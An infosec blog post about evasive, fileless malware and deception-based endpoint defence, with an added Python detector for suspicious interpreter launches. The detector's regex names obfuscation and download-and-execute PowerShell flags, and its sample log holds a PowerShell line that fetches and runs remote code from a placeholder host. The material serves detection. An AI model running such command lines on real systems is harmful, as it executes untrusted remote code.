Evasive Malware on the Rise: Time to Stop Stealth Attacks in their Tracks

Imagine discovering that the locks and alarms on the doors and windows of your home only worked sometimes, in unpredictable fashion. How would you keep thieves away from your valuables and protect your family members? Would you camp out in the front room keeping watch night after night? You’d have to find a way to outwit would-be intruders. Wouldn’t it be nice if you could trick them with an illusion that made your house look completely empty or full of hungry Rottweilers?

This made-up scenario is all too real in cyberspace. Information security solutions dependent on previously identified signatures, behaviors, or patterns simply do not stop every attack. As hackers increasingly employ stealthy evasive malware and ransomware techniques, organizations are recognizing they need an efficient and reliable way to beat the creepers at their own game. Businesses that don’t address evasive malware and ransomware head-on are in for a rude awakening. Cisco’s Midyear Cybersecurity Report confirms that malware developers are evolving and shifting their techniques with increasing skill and speed, even commoditizing their guerrilla weapons into ransomware-as-a-service platforms.

In a recent rash of attacks (150 organizations in 40 countries), fileless malware was used to access bank networks and install additional malware on ATMs that caused them to dispense cash at the touch of a button. It’s important to understand how these evasive exploits work. Malware authors aim to breach endpoints on their way to more extensive infiltration of systems and networks, often scraping credentials, installing spyware, or establishing the ability to remotely execute commands. In order to carry out such schemes, malware is designed to stay undetected for as long as possible. Malware is built to employ various ways of bypassing existing defenses, including checking the endpoint environment for AV, firewalls, gateways, debuggers, and sandboxes before launching its exploit mechanisms.

The most devious malware authors go out of their way to package their malware so that it can’t be fingerprinted: they know that once pinpointed, the unique identifiers will be incorporated into AV updates. These fileless attacks leverage known vulnerabilities (browsers, Java, Flash, etc.) and phishing campaigns to gain entry, run code in the target computer’s memory, and continue to infiltrate by launching script interpreters like PowerShell. Malware that manipulates existing Windows programs in this way is able to trick AV, as it is difficult to distinguish between legitimate macros and malicious document files. Similarly, if malware unpacks its code into a non-malicious process, AV has a hard time preventing the resulting attack. Sophisticated attackers are even using open-source penetration testing tools to inject code into (or scrape data from) system memory.

Fileless, evasive malware is shaping up to be the exploit of the future, at least until something more potent and insidious comes along. Businesses must move quickly to supplement their endpoint protection solutions that depend on previously identified patterns and signatures. Patching and updating remain essential, but realistically, these practices are chronically neglected and incomplete. Disabling macros, limiting access privileges, whitelisting applications, segmenting networks and blocking unnecessary protocols will eliminate many of the entry points and hiding places malware authors rely on, but only until they learn new tricks. Often, these measures are not practical or have an unacceptable impact on productivity. Training employees to detect phishing scams and setting email filters to thwart BEC (business email compromise) attacks are important, but not sufficiently reliable or comprehensive. Monitoring device and Windows logs is a good way to detect unauthorized services and processes, but most organizations are already struggling to keep up with alerts and incident reviews.
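The log-monitoring point above is the one measure in that list that a defender can implement in a few dozen lines. The following is an added example, not code from the original post or from Minerva: it runs a parent/child process check over a constructed, simplified process-creation log (the `timestamp|parent_image|image|command_line` layout, the interpreter and parent lists, and the argument regex are all assumptions chosen for illustration, loosely modelled on what Sysmon Event ID 1 or Windows Security Event 4688 record). It flags script interpreters such as PowerShell when they are launched by an Office application or browser, or with arguments typical of in-memory execution, while letting a routine admin script through.

```python
"""
Flag script-interpreter launches that are unusual for their parent process
or that carry arguments associated with in-memory execution.

Added example, not from the original post. Input is a constructed, simplified
process-creation log (one event per line, fields separated by '|'):
    timestamp|parent_image|image|command_line
"""
import re
from dataclasses import dataclass

# Interpreters that fileless techniques commonly ride on (assumed list).
SCRIPT_INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe",
}

# Parents that rarely have a legitimate reason to spawn an interpreter (assumed list).
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "chrome.exe", "firefox.exe", "iexplore.exe", "acrord32.exe",
}

# Command-line fragments that indicate hidden, encoded or remotely fetched code (assumed set).
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-enc(odedcommand)?\b|-nop\b|-w(indowstyle)?\s+hidden|"
    r"downloadstring|invoke-expression|\biex\b|frombase64string)"
)


@dataclass
class Finding:
    timestamp: str
    parent: str
    image: str
    reasons: list


def parse_event(line):
    """Split one log line into (timestamp, parent basename, image basename, command line)."""
    parts = line.strip().split("|", 3)  # maxsplit keeps any '|' inside the command line
    if len(parts) != 4:
        return None
    ts, parent, image, cmd = parts
    basename = lambda p: p.rsplit("\\", 1)[-1].lower()
    return ts, basename(parent), basename(image), cmd


def analyze(lines):
    """Return a Finding for every interpreter launch that trips at least one rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        ts, parent, image, cmd = ev
        if image not in SCRIPT_INTERPRETERS:
            continue  # only interpreter launches are in scope
        reasons = []
        if parent in SUSPICIOUS_PARENTS:
            reasons.append(f"{image} spawned by {parent}")
        m = SUSPICIOUS_ARGS.search(cmd)
        if m:
            reasons.append(f"suspicious argument '{m.group(0)}'")
        if reasons:
            findings.append(Finding(ts, parent, image, reasons))
    return findings


# Constructed sample log: one benign shell, one Office-spawned PowerShell with
# hidden/encoded flags, one scheduled admin script, one browser-spawned mshta,
# and one PowerShell that evaluates downloaded text.
SAMPLE_LOG = [
    r"2017-09-01T08:02:11|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir",
    r"2017-09-01T08:03:45|C:\Program Files\Microsoft Office\WINWORD.EXE|"
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell.exe -nop -w hidden -enc UGxhY2Vob2xkZXI=",
    r"2017-09-01T08:10:02|C:\Windows\System32\svchost.exe|"
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    r"2017-09-01T08:12:30|C:\Program Files\Internet Explorer\iexplore.exe|"
    r"C:\Windows\System32\mshta.exe|mshta.exe C:\Users\Public\update.hta",
    r"2017-09-01T08:15:00|C:\Windows\explorer.exe|"
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')\"",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.timestamp} {f.parent} -> {f.image}: {'; '.join(f.reasons)}")
```

The value of the parent/child rule is that it does not depend on any signature of the payload: a macro-launched interpreter looks the same whether the malware is known or brand new. In production the same two checks would be expressed as a SIEM or EDR rule over the real event fields rather than a script over a text file, and the parent and argument lists would be tuned against the organization's own baseline to keep the alert volume manageable.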

While the technology does not yet exist to fool thieves into thinking you have an empty house or a pack of vicious guard dogs, businesses seeking to outmaneuver stealthy malware do have some tricks at their disposal. Prevention-oriented solutions use the attackers’ evasive strengths against them, by purposefully deceiving the malware as it tests its target environment. By simulating a forensic environment that the malware identifies as inaccessible or not exploitable, these methods trigger the malware to disarm before it unpacks or does any damage. These simulation methods deceive the malware regarding its ability to interact with other processes, thereby preventing its access to memory and sensitive data. This approach is effective against a variety of memory injection techniques, which is essential to defending against the spread of fileless malware.

Creating this “virtual reality” on endpoints enables malware vaccination, contains threats designed to bypass existing security solutions, and works even on previously unseen and rapidly shape-shifting mechanisms. As the cyber wars escalate, it is painfully clear that fighting exploits tit-for-tat is an unsustainable battle plan. Cyber crime is too organized, advanced, and profitable — and the digital systems modern commerce and society rely on are too vast and interwoven. We need to develop and implement creative solutions that are broadly effective at turning “easy target” endpoints into dead ends for hackers and their tricks.

About the author: Eddy Boritsky is the CEO and Co-Founder of Minerva, an endpoint security solution provider. He is a cyber and information security domain expert. Before founding Minerva, Eddy was a senior cyber security consultant for the defense and financial sectors.

The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.
